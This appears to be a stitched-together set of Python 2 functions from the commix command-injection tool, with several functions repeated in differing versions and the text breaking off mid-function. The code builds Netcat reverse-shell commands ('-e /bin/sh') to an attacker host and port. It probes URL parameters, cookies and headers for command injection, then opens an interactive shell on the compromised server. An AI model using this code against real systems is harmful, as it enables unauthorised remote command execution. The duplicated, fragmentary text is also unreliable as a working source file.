def input_cmd(http_request_method, url, vuln_parameter, ip_src):
print "\nPseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
logs.logs_notification(filename)
os._exit(0)
elif cmd.lower() == "back":
os._exit(0)
else:
pass
else:
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
def input_cmd(http_request_method, url, vuln_parameter, ip_src):
print "\nPseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
logs.logs_notification(filename)
os._exit(0)
elif cmd.lower() == "back":
os._exit(0)
else:
pass
else:
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
def reverse_tcp_options(lhost, lport):
while True:
reverse_tcp_option = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Reverse TCP shells""" + Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a Netcat reverse TCP shell.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' for other reverse TCP shells.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """)
# Option 1 - Netcat shell
if reverse_tcp_option == '1' :
reverse_tcp_option = netcat_version(lhost, lport)
break
# Option 2 - Other (Netcat-Without-Netcat) shells
elif reverse_tcp_option == '2' :
reverse_tcp_option = other_reverse_shells(lhost, lport)
break
elif reverse_tcp_option.lower() == "reverse_tcp":
print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL
continue
elif reverse_tcp_option.lower() == "?":
menu.shell_options()
continue
elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
return reverse_tcp_option
else:
print Back.RED + "(x) Error: The '" + reverse_tcp_option + "' option, is not valid." + Style.RESET_ALL
continue
return reverse_tcp_option
def reverse_tcp_options(lhost, lport):
while True:
reverse_tcp_option = raw_input("""
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a Netcat reverse TCP shell.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' for other reverse TCP shells.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """)
# Option 1 - Netcat shell
if reverse_tcp_option == '1' :
reverse_tcp_option = netcat_version(lhost, lport)
break
# Option 2 - Other (Netcat-Without-Netcat) shells
elif reverse_tcp_option == '2' :
reverse_tcp_option = other_reverse_shells(lhost, lport)
break
elif reverse_tcp_option.lower() == "reverse_tcp":
print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL
continue
elif reverse_tcp_option.lower() == "?":
menu.shell_options()
continue
elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
return reverse_tcp_option
else:
print Back.RED + "(x) Error: The '" + reverse_tcp_option + "' option, is not valid." + Style.RESET_ALL
continue
return reverse_tcp_option
def netcat_version():
# Netcat alternatives
NETCAT_ALTERNATIVES = ["/bin/nc", "/bin/busybox nc", "/bin/nc.traditional"]
while True:
nc_version = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" +
Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL +
"""' to use the default Netcat on target host.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL +
"""' to use Netcat for Busybox on target host.
Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL +
"""' to use Netcat-Traditional on target host.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" +
Style.RESET_ALL + """) > """)
# Default Netcat
if nc_version == '1':
nc_alternative = NETCAT_ALTERNATIVES[0]
break
# Netcat for Busybox
if nc_version == '2':
nc_alternative = NETCAT_ALTERNATIVES[1]
break
# Netcat-Traditional
elif nc_version == '3':
nc_alternative = NETCAT_ALTERNATIVES[2]
break
elif nc_version.lower() == "reverse_tcp":
warn_msg = "You are already into the 'reverse_tcp' mode."
print settings.print_warning_msg(warn_msg)
continue
elif nc_version.lower() == "?":
menu.shell_options()
continue
elif nc_version.lower() in settings.SHELL_OPTIONS:
return nc_version
elif nc_version[0:3].lower() == "set":
if nc_version[4:9].lower() == "lhost":
check_lhost(nc_version[10:])
if nc_version[4:9].lower() == "lport":
check_lport(nc_version[10:])
else:
err_msg = "The '" + nc_version + "' option, is not valid."
print settings.print_error_msg(err_msg)
continue
cmd = nc_alternative + " " + settings.LHOST + " " + settings.LPORT + " -e /bin/sh"
return cmd
def check_os_shell_options(cmd, technique, go_back, no_result):
if cmd in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
elif cmd == "back":
go_back = True
if next_attack_vector(technique, go_back) == True:
return "back"
else:
return False
else:
return cmd
def check_os_shell_options(cmd, technique, go_back, no_result):
if cmd in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
elif cmd == "back":
go_back = True
if next_attack_vector(technique, go_back) == True:
return "back"
else:
return False
else:
return cmd
def netcat_version():
# Netcat alternatives
NETCAT_ALTERNATIVES = [
"/bin/nc",
"/bin/busybox nc",
"/bin/nc.traditional"
]
while True:
nc_version = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" + Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use the default Netcat on target host.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use Netcat for Busybox on target host.
Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Netcat-Traditional on target host.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" + Style.RESET_ALL + """) > """)
# Default Netcat
if nc_version == '1':
nc_alternative = NETCAT_ALTERNATIVES[0]
break
# Netcat for Busybox
if nc_version == '2':
nc_alternative = NETCAT_ALTERNATIVES[1]
break
# Netcat-Traditional
elif nc_version == '3':
nc_alternative = NETCAT_ALTERNATIVES[2]
break
elif nc_version.lower() == "reverse_tcp":
warn_msg = "You are already into the 'reverse_tcp' mode."
print settings.print_warning_msg(warn_msg)
continue
elif nc_version.lower() == "?":
menu.shell_options()
continue
elif nc_version.lower() in settings.SHELL_OPTIONS:
return nc_version
elif nc_version[0:3].lower() == "set":
if nc_version[4:9].lower() == "lhost":
check_lhost(nc_version[10:])
if nc_version[4:9].lower() == "lport":
check_lport(nc_version[10:])
else:
err_msg = "The '" + nc_version + "' option, is not valid."
print settings.print_error_msg(err_msg)
continue
cmd = nc_alternative + " " + settings.LHOST + " " + settings.LPORT + " -e /bin/sh"
return cmd
def configure_reverse_tcp():
# Set up LHOST for The reverse TCP connection
while True:
lhost = raw_input("""commix(""" + Style.BRIGHT + Fore.RED +
"""reverse_tcp_lhost""" + Style.RESET_ALL +
""") > """)
if lhost.lower() == "reverse_tcp":
print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n"
continue
elif lhost.lower() == "?":
menu.shell_options()
continue
elif lhost.lower() in settings.SHELL_OPTIONS:
lport = lhost
return lhost, lport
else:
parts = lhost.split('.')
if len(parts) == 4 and all(part.isdigit()
for part in parts) and all(
0 <= int(part) <= 255
for part in parts):
break
else:
print Back.RED + "(x) Error: The IP format is not valid." + Style.RESET_ALL
continue
# Set up LPORT for The reverse TCP connection
while True:
lport = raw_input("""commix(""" + Style.BRIGHT + Fore.RED +
"""reverse_tcp_lport""" + Style.RESET_ALL +
""") > """)
if lport.lower() == "reverse_tcp":
print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n"
continue
elif lport.lower() == "?":
menu.shell_options()
continue
elif lport.lower() in settings.SHELL_OPTIONS:
lhost = lport
return lhost, lport
else:
try:
if float(lport):
break
except ValueError:
print Back.RED + "(x) Error: The port must be numeric." + Style.RESET_ALL
continue
return lhost, lport
def netcat_version(lhost, lport):
# Netcat alternatives
NETCAT_ALTERNATIVES = ["/bin/nc", "/bin/busybox nc", "/bin/nc.traditional"]
while True:
nc_version = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" +
Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL +
"""' to use the default Netcat on target host.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL +
"""' to use Netcat for Busybox on target host.
Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL +
"""' to use Netcat-Traditional on target host.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" +
Style.RESET_ALL + """) > """)
# Default Netcat
if nc_version == '1':
nc_alternative = NETCAT_ALTERNATIVES[0]
break
# Netcat for Busybox
if nc_version == '2':
nc_alternative = NETCAT_ALTERNATIVES[1]
break
# Netcat-Traditional
elif nc_version == '3':
nc_alternative = NETCAT_ALTERNATIVES[2]
break
elif nc_version.lower() == "reverse_tcp":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL
continue
elif nc_version.lower() == "?":
menu.shell_options()
continue
elif nc_version.lower() in settings.SHELL_OPTIONS:
return nc_version
else:
print Back.RED + settings.ERROR_SIGN + "The '" + nc_version + "' option, is not valid." + Style.RESET_ALL
continue
cmd = nc_alternative + " " + lhost + " " + lport + " -e /bin/sh"
return cmd
def configure_reverse_tcp():
# Set up LHOST for The reverse TCP connection
while True:
lhost = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_lhost""" + Style.RESET_ALL + """) > """)
if lhost.lower() == "reverse_tcp":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n"
continue
elif lhost.lower() == "?":
menu.shell_options()
continue
elif lhost.lower() == "quit":
sys.exit(0)
elif lhost.lower() in settings.SHELL_OPTIONS:
lport = lhost
return lhost, lport
else:
parts = lhost.split('.')
if len(parts) == 4 and all(part.isdigit() for part in parts) and all(0 <= int(part) <= 255 for part in parts):
break
else:
print Back.RED + settings.ERROR_SIGN + "The IP format is not valid." + Style.RESET_ALL
continue
# Set up LPORT for The reverse TCP connection
while True:
lport = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_lport""" + Style.RESET_ALL + """) > """)
if lport.lower() == "reverse_tcp":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n"
continue
elif lport.lower() == "?":
menu.shell_options()
continue
elif lhost.lower() == "quit":
sys.exit(0)
elif lport.lower() in settings.SHELL_OPTIONS:
lhost = lport
return lhost, lport
else:
try:
if float(lport):
break
except ValueError:
print Back.RED + settings.ERROR_SIGN + "The port must be numeric." + Style.RESET_ALL
continue
return lhost, lport
def netcat_version(lhost, lport):
# Netcat alternatives
NETCAT_ALTERNATIVES = [
"/bin/nc",
"/bin/busybox nc",
"/bin/nc.traditional"
]
while True:
nc_version = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" + Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use the default Netcat on target host.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use Netcat for Busybox on target host.
Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Netcat-Traditional on target host.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" + Style.RESET_ALL + """) > """)
# Default Netcat
if nc_version == '1':
nc_alternative = NETCAT_ALTERNATIVES[0]
break
# Netcat for Busybox
if nc_version == '2':
nc_alternative = NETCAT_ALTERNATIVES[1]
break
# Netcat-Traditional
elif nc_version == '3':
nc_alternative = NETCAT_ALTERNATIVES[2]
break
elif nc_version.lower() == "reverse_tcp":
print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL
continue
elif nc_version.lower() == "?":
menu.shell_options()
continue
elif nc_version.lower() in settings.SHELL_OPTIONS:
return nc_version
else:
print Back.RED + "(x) Error: The '" + nc_version + "' option, is not valid." + Style.RESET_ALL
continue
cmd = nc_alternative + " " + lhost + " " + lport + " -e /bin/sh"
return cmd
def reverse_tcp_options():
while True:
reverse_tcp_option = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Reverse TCP shells""" +
Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL +
"""' to use a Netcat reverse TCP shell.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL +
"""' for other reverse TCP shells.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL +
""") > """)
# Option 1 - Netcat shell
if reverse_tcp_option == '1':
reverse_tcp_option = netcat_version()
break
# Option 2 - Other (Netcat-Without-Netcat) shells
elif reverse_tcp_option == '2':
reverse_tcp_option = other_reverse_shells()
break
elif reverse_tcp_option.lower() == "reverse_tcp":
warn_msg = "You are already into the 'reverse_tcp' mode."
print settings.print_warning_msg(warn_msg)
continue
elif reverse_tcp_option.lower() == "?":
menu.shell_options()
continue
elif reverse_tcp_option.lower() == "quit":
sys.exit(0)
elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
return reverse_tcp_option
elif reverse_tcp_option[0:3].lower() == "set":
if reverse_tcp_option[4:9].lower() == "lhost":
check_lhost(reverse_tcp_option[10:])
if reverse_tcp_option[4:9].lower() == "lport":
check_lport(reverse_tcp_option[10:])
else:
err_msg = "The '" + reverse_tcp_option + "' option, is not valid."
print settings.print_error_msg(err_msg)
continue
return reverse_tcp_option
def configure_reverse_tcp():
# Set up LHOST for the reverse TCP connection
while True:
option = raw_input("""commix(""" + Style.BRIGHT + Fore.RED +
"""reverse_tcp""" + Style.RESET_ALL + """) > """)
if option.lower() == "reverse_tcp":
warn_msg = "You are already into the 'reverse_tcp' mode."
print settings.print_warning_msg(warn_msg) + "\n"
continue
elif option.lower() == "?":
menu.shell_options()
continue
elif option.lower() == "quit":
sys.exit(0)
elif option[0:3].lower() == "set":
if option[4:9].lower() == "lhost":
if check_lhost(option[10:]):
if len(settings.LPORT) == 0:
pass
else:
break
else:
continue
if option[4:9].lower() == "lport":
if check_lport(option[10:]):
if len(settings.LHOST) == 0:
pass
else:
break
else:
continue
elif option.lower() == "os_shell" or option.lower() == "back":
settings.REVERSE_TCP = False
break
else:
err_msg = "The '" + option + "' option, is not valid."
print settings.print_error_msg(err_msg)
pass
# eof
def reverse_tcp_options():
while True:
reverse_tcp_option = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Reverse TCP shells""" + Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a Netcat reverse TCP shell.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' for other reverse TCP shells.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """)
# Option 1 - Netcat shell
if reverse_tcp_option == '1' :
reverse_tcp_option = netcat_version()
break
# Option 2 - Other (Netcat-Without-Netcat) shells
elif reverse_tcp_option == '2' :
reverse_tcp_option = other_reverse_shells()
break
elif reverse_tcp_option.lower() == "reverse_tcp":
warn_msg = "You are already into the 'reverse_tcp' mode."
print settings.print_warning_msg(warn_msg)
continue
elif reverse_tcp_option.lower() == "?":
menu.shell_options()
continue
elif reverse_tcp_option.lower() == "quit":
sys.exit(0)
elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
return reverse_tcp_option
elif reverse_tcp_option[0:3].lower() == "set":
if reverse_tcp_option[4:9].lower() == "lhost":
check_lhost(reverse_tcp_option[10:])
if reverse_tcp_option[4:9].lower() == "lport":
check_lport(reverse_tcp_option[10:])
else:
err_msg = "The '" + reverse_tcp_option + "' option, is not valid."
print settings.print_error_msg(err_msg)
continue
return reverse_tcp_option
def configure_reverse_tcp():
# Set up LHOST for the reverse TCP connection
while True:
option = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """)
if option.lower() == "reverse_tcp":
warn_msg = "You are already into the 'reverse_tcp' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
continue
elif option.lower() == "?":
menu.shell_options()
continue
elif option.lower() == "quit":
sys.exit(0)
elif option[0:3].lower() == "set":
if option[4:9].lower() == "lhost":
if check_lhost(option[10:]):
if len(settings.LPORT) == 0:
pass
else:
break
else:
continue
if option[4:9].lower() == "lport":
if check_lport(option[10:]):
if len(settings.LHOST) == 0:
pass
else:
break
else:
continue
elif option.lower() == "os_shell" or option.lower() == "back":
settings.REVERSE_TCP = False
break
else:
err_msg = "The '" + option + "' option, is not valid."
print settings.print_error_msg(err_msg)
pass
# eof
def configure_reverse_tcp():
# Set up LHOST for the reverse TCP connection
while True:
option = raw_input("""commix(""" + Style.BRIGHT + Fore.RED +
"""reverse_tcp""" + Style.RESET_ALL + """) > """)
if option.lower() == "reverse_tcp":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n"
continue
elif option.lower() == "?":
menu.shell_options()
continue
elif option.lower() == "quit":
sys.exit(0)
elif option[0:3].lower() == "set":
if option[4:9].lower() == "lhost":
if check_lhost(option[10:]):
if len(settings.LPORT) == 0:
pass
else:
break
else:
continue
if option[4:9].lower() == "lport":
if check_lport(option[10:]):
if len(settings.LHOST) == 0:
pass
else:
break
else:
continue
elif option.lower() == "os_shell" or "back":
settings.REVERSE_TCP = False
break
else:
print Back.RED + settings.ERROR_SIGN + "The '" + option + "' option, is not valid." + Style.RESET_ALL
pass
# eof
def configure_reverse_tcp():
# Set up LHOST for the reverse TCP connection
while True:
option = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """)
if option.lower() == "reverse_tcp":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n"
continue
elif option.lower() == "?":
menu.shell_options()
continue
elif option.lower() == "quit":
sys.exit(0)
elif option[0:3].lower() == "set":
if option[4:9].lower() == "lhost":
if check_lhost(option[10:]):
if len(settings.LPORT) == 0:
pass
else:
break
else:
continue
if option[4:9].lower() == "lport":
if check_lport(option[10:]):
if len(settings.LHOST) == 0:
pass
else:
break
else:
continue
elif option.lower() == "os_shell" or "back":
settings.REVERSE_TCP = False
break
else:
print Back.RED + settings.ERROR_SIGN + "The '" + option + "' option, is not valid." + Style.RESET_ALL
pass
# eof
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique):
err_msg = ""
if menu.enumeration_options():
err_msg += "enumeration"
if menu.file_access_options():
if err_msg != "":
err_msg = err_msg + " and "
err_msg = err_msg + "file-access"
if err_msg != "":
print Fore.YELLOW + settings.WARNING_SIGN + "The " + err_msg + " options are not supported by this module because of the structure of the exfiltrated data. Please try using any unix-like commands manually." + Style.RESET_ALL
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("\n" + settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif cmd.lower() == "reverse_tcp":
print Fore.YELLOW + settings.WARNING_SIGN + "This option is not supported by this module." + Style.RESET_ALL + "\n"
else:
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n"
pass
def eb_injection_handler(url, delay, filename, http_request_method):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "Results-based Command Injection"
technique = "eval-based injection technique"
sys.stdout.write("(*) Testing the " + technique + "... ")
sys.stdout.flush()
i = 0
# Calculate all possible combinations
total = len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(
settings.EVAL_SUFFIXES)
for prefix in settings.EVAL_PREFIXES:
for suffix in settings.EVAL_SUFFIXES:
for separator in settings.EVAL_SEPARATORS:
i = i + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(
random.choice(string.ascii_uppercase) for i in range(6))
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
try:
# Eval-based decision payload (check if host is vulnerable).
payload = eb_payloads.decision(separator, TAG, randv1,
randv2)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload,
urllib.quote(suffix))
payload = payload + "" + TAG + ""
payload = re.sub(" ", "%20", payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
response = eb_injector.cookie_injection_test(
url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(
menu.options.agent)
response = eb_injector.user_agent_injection_test(
url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(
menu.options.referer)
response = eb_injector.referer_injection_test(
url, vuln_parameter, payload)
else:
found_cookie_injection = False
# Check if target host is vulnerable.
response, vuln_parameter = eb_injector.injection_test(
payload, http_request_method, url)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate test results.
shell = eb_injector.injection_test_results(
response, TAG, randvcalc)
if not menu.options.verbose:
percent = ((i * 100) / total)
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent) + "%"
elif len(shell) != 0:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(percent) + "%"
sys.stdout.write("\r(*) Testing the " + technique +
"... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
continue
# Yaw, got shellz!
# Do some magic tricks!
if shell:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(
url)
else:
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0:
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(
export_injection_info, filename, injection_type,
technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename,
http_request_method,
vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
) + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
"%20", " ", payload) + Style.RESET_ALL
# Check for any enumeration options.
eb_enumeration.do_check(separator, TAG, prefix, suffix,
http_request_method, url,
vuln_parameter)
# Check for any system file access options.
eb_file_access.do_check(separator, TAG, prefix, suffix,
http_request_method, url,
vuln_parameter)
# Check if defined single cmd.
if menu.options.os_cmd:
eb_enumeration.single_os_cmd_exec(
separator, TAG, prefix, suffix,
http_request_method, url, vuln_parameter)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input(
"\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > "
).lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
response = eb_injector.injection(
separator, TAG, cmd, prefix,
suffix, http_request_method, url,
vuln_parameter)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Command execution results.
shell = eb_injector.injection_results(
response, TAG)
if shell:
shell = "".join(
str(p) for p in shell).replace(
" ", "", 1)[:-1]
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write(
"\r(*) Continue testing the " + technique +
"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else:
sys.stdout.write("\r")
sys.stdout.flush()
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response):
percent = 0
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "Blind-based Command Injection"
technique = "time-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = settings.MAXLEN
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Define alter shell
alter_shell = menu.options.alter_shell
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
if alter_shell:
# Time-based decision payload (check if host is vulnerable).
payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
else:
# Time-based decision payload (check if host is vulnerable).
payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)
# Injection percentage calculation
